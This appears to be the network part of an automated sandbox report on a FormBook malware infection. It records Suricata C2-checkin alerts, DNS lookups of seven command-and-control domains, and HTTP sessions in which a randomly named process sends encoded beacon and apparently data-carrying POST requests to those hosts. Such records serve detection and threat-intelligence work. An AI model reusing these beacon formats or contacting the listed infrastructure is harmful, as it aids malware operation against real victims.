Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-06T09:32:50.567866+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49793 | 74.208.236.156 | 80 | TCP
2024-12-06T09:33:15.401198+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49854 | 84.32.84.32 | 80 | TCP
2024-12-06T09:33:30.175870+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49893 | 13.248.169.48 | 80 | TCP
2024-12-06T09:33:44.927682+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49928 | 66.29.149.46 | 80 | TCP
2024-12-06T09:33:59.682341+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49967 | 3.33.130.190 | 80 | TCP
2024-12-06T09:34:14.929015+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50005 | 129.226.153.85 | 80 | TCP
2024-12-06T09:34:30.508372+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50033 | 104.21.7.187 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                            Dec 6, 2024 09:33:25.257517099 CET4987780192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:26.282963037 CET4988380192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:26.402766943 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:26.402913094 CET4988380192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:26.417774916 CET4988380192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:26.537619114 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:26.537635088 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:26.537759066 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:26.537787914 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:26.537918091 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:26.537995100 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:26.538136005 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:26.538199902 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:26.538300991 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:27.501828909 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:27.514877081 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:27.514931917 CET4988380192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:27.929272890 CET4988380192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:28.948360920 CET4989380192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:29.068183899 CET804989313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:29.068326950 CET4989380192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:29.078272104 CET4989380192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:29.197985888 CET804989313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:30.175510883 CET804989313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:30.175532103 CET804989313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:30.175869942 CET4989380192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:30.178553104 CET4989380192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:30.298243046 CET804989313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:35.582091093 CET4990980192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:35.702044010 CET804990966.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:35.702120066 CET4990980192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:35.718354940 CET4990980192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:35.838104010 CET804990966.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:36.940644979 CET804990966.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:36.940819025 CET804990966.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:36.940884113 CET4990980192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:37.226471901 CET4990980192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:38.245369911 CET4991580192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:38.365242004 CET804991566.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:38.365477085 CET4991580192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:38.385524035 CET4991580192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:38.505287886 CET804991566.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:39.594408989 CET804991566.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:39.594544888 CET804991566.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:39.594656944 CET4991580192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:39.898053885 CET4991580192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:40.917351961 CET4992280192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:41.037259102 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:41.037345886 CET4992280192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:41.053081989 CET4992280192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:41.173074007 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:41.173099041 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:41.173156977 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:41.173194885 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:41.173238993 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:41.173294067 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:41.173417091 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:41.173511982 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:41.173711061 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:42.341586113 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:42.341694117 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:42.341744900 CET4992280192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:42.554330111 CET4992280192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:43.573290110 CET4992880192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:43.693461895 CET804992866.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:43.693603992 CET4992880192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:43.704458952 CET4992880192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:43.824206114 CET804992866.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:44.927356005 CET804992866.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:44.927386045 CET804992866.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:44.927681923 CET4992880192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:44.930295944 CET4992880192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:45.049969912 CET804992866.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:50.463823080 CET4994480192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:50.583554983 CET80499443.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:50.583681107 CET4994480192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:50.599488020 CET4994480192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:50.719144106 CET80499443.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:51.680159092 CET80499443.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:51.680320024 CET80499443.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:51.680394888 CET4994480192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:52.123198986 CET4994480192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:53.137933969 CET4995480192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:53.257635117 CET80499543.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:53.257772923 CET4995480192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:53.275473118 CET4995480192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:53.395236969 CET80499543.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:54.352587938 CET80499543.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:54.352756977 CET80499543.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:54.352835894 CET4995480192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:54.789581060 CET4995480192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:55.807003021 CET4996080192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:55.926791906 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:55.927000999 CET4996080192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:55.942903042 CET4996080192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:56.062938929 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:56.062952995 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:56.062968016 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:56.062978983 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:56.063000917 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:56.063163996 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:56.063230038 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:56.063240051 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:56.063280106 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:57.024739981 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:57.024986029 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:57.025067091 CET4996080192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:57.444972992 CET4996080192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:58.463835001 CET4996780192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:58.583678007 CET80499673.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:58.583753109 CET4996780192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:58.593664885 CET4996780192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:58.713356018 CET80499673.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:59.682074070 CET80499673.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:59.682281971 CET80499673.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:59.682341099 CET4996780192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:59.684819937 CET4996780192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:59.804570913 CET80499673.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:34:05.272212982 CET4998380192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:05.391947031 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:05.392067909 CET4998380192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:05.413283110 CET4998380192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:05.533097982 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:06.929465055 CET4998380192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:06.936852932 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:06.936871052 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:06.936882973 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:06.936980963 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:06.936994076 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:06.936997890 CET4998380192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:06.937009096 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:06.937024117 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:06.937154055 CET4998380192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:06.937184095 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:06.937196970 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:06.937259912 CET4998380192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:06.937273979 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:06.937283039 CET4998380192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:06.937345028 CET4998380192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:07.948371887 CET4998980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:08.068165064 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:08.068285942 CET4998980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:08.083704948 CET4998980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:08.203481913 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:09.585797071 CET4998980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:09.608288050 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:09.608318090 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:09.608330965 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:09.608371973 CET4998980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:09.608402014 CET4998980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:09.608472109 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:09.608484983 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:09.608495951 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:09.608510017 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:09.608534098 CET4998980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:09.608565092 CET4998980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:09.608726978 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:09.608738899 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:09.608779907 CET4998980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:09.608812094 CET4998980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:09.608844042 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.406285048 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.411058903 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.411112070 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.411144972 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.415932894 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.415998936 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.580789089 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.700553894 CET8050033104.21.7.187192.168.2.4
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 6, 2024 09:32:48.816613913 CET5827953192.168.2.41.1.1.1
                                                                                                            Dec 6, 2024 09:32:49.283658028 CET53582791.1.1.1192.168.2.4
                                                                                                            Dec 6, 2024 09:33:05.635869026 CET5468953192.168.2.41.1.1.1
                                                                                                            Dec 6, 2024 09:33:06.104470015 CET53546891.1.1.1192.168.2.4
                                                                                                            Dec 6, 2024 09:33:20.417614937 CET5517753192.168.2.41.1.1.1
                                                                                                            Dec 6, 2024 09:33:20.947333097 CET53551771.1.1.1192.168.2.4
                                                                                                            Dec 6, 2024 09:33:35.183306932 CET6542953192.168.2.41.1.1.1
                                                                                                            Dec 6, 2024 09:33:35.579433918 CET53654291.1.1.1192.168.2.4
                                                                                                            Dec 6, 2024 09:33:49.955683947 CET6343053192.168.2.41.1.1.1
                                                                                                            Dec 6, 2024 09:33:50.461134911 CET53634301.1.1.1192.168.2.4
                                                                                                            Dec 6, 2024 09:34:04.699786901 CET6155253192.168.2.41.1.1.1
                                                                                                            Dec 6, 2024 09:34:05.269583941 CET53615521.1.1.1192.168.2.4
                                                                                                            Dec 6, 2024 09:34:20.433151960 CET5365553192.168.2.41.1.1.1
                                                                                                            Dec 6, 2024 09:34:20.754714012 CET53536551.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 6, 2024 09:32:48.816613913 CET | 192.168.2.4 | 1.1.1.1 | 0xf97b | Standard query (0) | www.christinascuties.net | A (IP address) | IN (0x0001) | false
Dec 6, 2024 09:33:05.635869026 CET | 192.168.2.4 | 1.1.1.1 | 0xa9ab | Standard query (0) | www.techmiseajour.net | A (IP address) | IN (0x0001) | false
Dec 6, 2024 09:33:20.417614937 CET | 192.168.2.4 | 1.1.1.1 | 0xc2fe | Standard query (0) | www.aktmarket.xyz | A (IP address) | IN (0x0001) | false
Dec 6, 2024 09:33:35.183306932 CET | 192.168.2.4 | 1.1.1.1 | 0x206e | Standard query (0) | www.golivenow.live | A (IP address) | IN (0x0001) | false
Dec 6, 2024 09:33:49.955683947 CET | 192.168.2.4 | 1.1.1.1 | 0xa95b | Standard query (0) | www.iglpg.online | A (IP address) | IN (0x0001) | false
Dec 6, 2024 09:34:04.699786901 CET | 192.168.2.4 | 1.1.1.1 | 0xd803 | Standard query (0) | www.1qcczjvh2.autos | A (IP address) | IN (0x0001) | false
Dec 6, 2024 09:34:20.433151960 CET | 192.168.2.4 | 1.1.1.1 | 0xf156 | Standard query (0) | www.gk88top.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 6, 2024 09:32:49.283658028 CET | 1.1.1.1 | 192.168.2.4 | 0xf97b | No error (0) | www.christinascuties.net | | 74.208.236.156 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 09:33:06.104470015 CET | 1.1.1.1 | 192.168.2.4 | 0xa9ab | No error (0) | www.techmiseajour.net | techmiseajour.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 6, 2024 09:33:06.104470015 CET | 1.1.1.1 | 192.168.2.4 | 0xa9ab | No error (0) | techmiseajour.net | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 09:33:20.947333097 CET | 1.1.1.1 | 192.168.2.4 | 0xc2fe | No error (0) | www.aktmarket.xyz | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 09:33:20.947333097 CET | 1.1.1.1 | 192.168.2.4 | 0xc2fe | No error (0) | www.aktmarket.xyz | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 09:33:35.579433918 CET | 1.1.1.1 | 192.168.2.4 | 0x206e | No error (0) | www.golivenow.live | | 66.29.149.46 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 09:33:50.461134911 CET | 1.1.1.1 | 192.168.2.4 | 0xa95b | No error (0) | www.iglpg.online | iglpg.online | | CNAME (Canonical name) | IN (0x0001) | false
Dec 6, 2024 09:33:50.461134911 CET | 1.1.1.1 | 192.168.2.4 | 0xa95b | No error (0) | iglpg.online | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 09:33:50.461134911 CET | 1.1.1.1 | 192.168.2.4 | 0xa95b | No error (0) | iglpg.online | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 09:34:05.269583941 CET | 1.1.1.1 | 192.168.2.4 | 0xd803 | No error (0) | www.1qcczjvh2.autos | 1.1qcczjvh2.autos | | CNAME (Canonical name) | IN (0x0001) | false
Dec 6, 2024 09:34:05.269583941 CET | 1.1.1.1 | 192.168.2.4 | 0xd803 | No error (0) | 1.1qcczjvh2.autos | 1hong-fted.pels5zqo.shop | | CNAME (Canonical name) | IN (0x0001) | false
Dec 6, 2024 09:34:05.269583941 CET | 1.1.1.1 | 192.168.2.4 | 0xd803 | No error (0) | 1hong-fted.pels5zqo.shop | 1hong.pels5zqo.shop | | CNAME (Canonical name) | IN (0x0001) | false
Dec 6, 2024 09:34:05.269583941 CET | 1.1.1.1 | 192.168.2.4 | 0xd803 | No error (0) | 1hong.pels5zqo.shop | | 129.226.153.85 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 09:34:20.754714012 CET | 1.1.1.1 | 192.168.2.4 | 0xf156 | No error (0) | www.gk88top.top | | 104.21.7.187 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 09:34:20.754714012 CET | 1.1.1.1 | 192.168.2.4 | 0xf156 | No error (0) | www.gk88top.top | | 172.67.137.47 | A (IP address) | IN (0x0001) | false
                                                                                                            • www.christinascuties.net
                                                                                                            • www.techmiseajour.net
                                                                                                            • www.aktmarket.xyz
                                                                                                            • www.golivenow.live
                                                                                                            • www.iglpg.online
                                                                                                            • www.1qcczjvh2.autos
                                                                                                            • www.gk88top.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49793 | 74.208.236.156 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 09:32:49.420677900 CET | 417 | OUT | GET /raea/?yhXxt4VH=PqKj/8KuIq0WSNkKBtU6xtT3L0EMxYs1M43YI/iJd5qBB0feLv8ZTXGbO6iF0HlQbmuDykhZpdeI6maFWjpp4la8Hrjym6l49HTLUW+OY0E4RirZFYV27mA=&7j=yfeP18RhphLhR HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.christinascuties.net
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Dec 6, 2024 09:32:50.566658974 CET | 770 | IN | HTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 626
                                                                                                            Connection: close
                                                                                                            Date: Fri, 06 Dec 2024 08:32:50 GMT
                                                                                                            Server: Apache
                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49832 | 84.32.84.32 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 09:33:06.242942095 CET | 688 | OUT | POST /jytl/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.techmiseajour.net
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 205
                                                                                                            Origin: http://www.techmiseajour.net
                                                                                                            Referer: http://www.techmiseajour.net/jytl/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Ascii: yhXxt4VH=t4Js6+7a0GL8SYtkvy7mDh+3+X0Oo49UCRxh0f+2OQIHutJyauU5UQDaeLmKcmC43IL1GqrQUMONrowUuOOoKNUenR7mPmogG145EUtnIKZy8P32yjnhiOQuJ8zybmGviN+XbWjyFEXD7pMhxzd0jKybZj0eAaDUiGTqypOeAeB7ybAUZlbgfKpfkYwmeGYaLQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49838 | 84.32.84.32 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 09:33:08.914823055 CET | 708 | OUT | POST /jytl/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.techmiseajour.net
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 225
                                                                                                            Origin: http://www.techmiseajour.net
                                                                                                            Referer: http://www.techmiseajour.net/jytl/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Ascii: yhXxt4VH=t4Js6+7a0GL8T49ktRDmPR+wiH0OyI9QCRth0aemOG4HuI1ybvU5ZwDaWrm1BWCz3IHLGrnQUMaNrpAUu/OnLdUcqx7kSWogG145EXRBIKBy8/H2zGLiquQtO8zyfmGriN/4bUXUFHvD7swh/Hp3tKydGz1CJf2b6Wuj4qL/Pdtl3dNOIU63NKNs5f5STFlTQSkwKgfRq4LUo40TgUiiWow=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49847 | 84.32.84.32 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 09:33:11.603178978 CET | 10790 | OUT | POST /jytl/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.techmiseajour.net
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 10305
                                                                                                            Origin: http://www.techmiseajour.net
                                                                                                            Referer: http://www.techmiseajour.net/jytl/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49854 | 84.32.84.32 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
Timestamp | Bytes transferred | Direction | Data
